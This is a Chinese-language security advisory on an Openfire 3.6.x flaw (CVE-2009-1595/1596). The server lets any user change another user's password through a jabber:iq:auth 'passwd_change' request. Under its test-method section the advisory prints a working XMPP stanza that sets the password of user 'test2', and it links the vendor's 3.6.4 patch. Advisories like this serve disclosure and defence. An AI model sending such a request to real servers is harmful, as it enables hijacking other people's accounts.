安全研究

安全漏洞
Openfire jabber:iq:auth 'passwd_change'请求远程更改口令漏洞

发布日期:2009-05-04
更新日期:2009-05-05

受影响系统:
Ignite Realtime Openfire 3.6.x
不受影响系统:
Ignite Realtime Openfire 3.6.4
描述:
BUGTRAQ  ID: 34804
CVE(CAN) ID: CVE-2009-1595,CVE-2009-1596

Openfire(原名为Wildfire)是一个采用Java开发的跨平台开源实时协作(RTC)服务器。

Openfire没有正确地验证发送iq:auth请求的用户名是否属于发送请求的用户,远程攻击者可以通过向服务器发送jabber:iq:auth "passwd_change"请求更改其他用户的口令;此外Openfire没有正确地实现no password changes设置,即使控制台中禁止更改口令攻击者仍可通过发送jabber:iq:auth "passwd_change"请求手动更改口令。

<*来源:Daryl Herzmann
  
  链接:http://secunia.com/advisories/34976/
        http://secunia.com/advisories/34984/
        http://www.igniterealtime.org/issues/si/jira.issueviews:issue-html/JM-1532/JM-1532.html
        http://www.igniterealtime.org/issues/si/jira.issueviews:issue-html/JM-1531/JM-1531.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<iq type='set' id='passwd_change'>
<query xmlns='jabber:iq:auth'>
<username>test2</username>
<password>newillegalychangedpassword</password>
</query>
</iq>

建议:
厂商补丁:

Ignite Realtime
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.igniterealtime.org/downloads/download-landing.jsp?file=openfire/openfire_3_6_4.tar.gz

浏览次数:2987
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障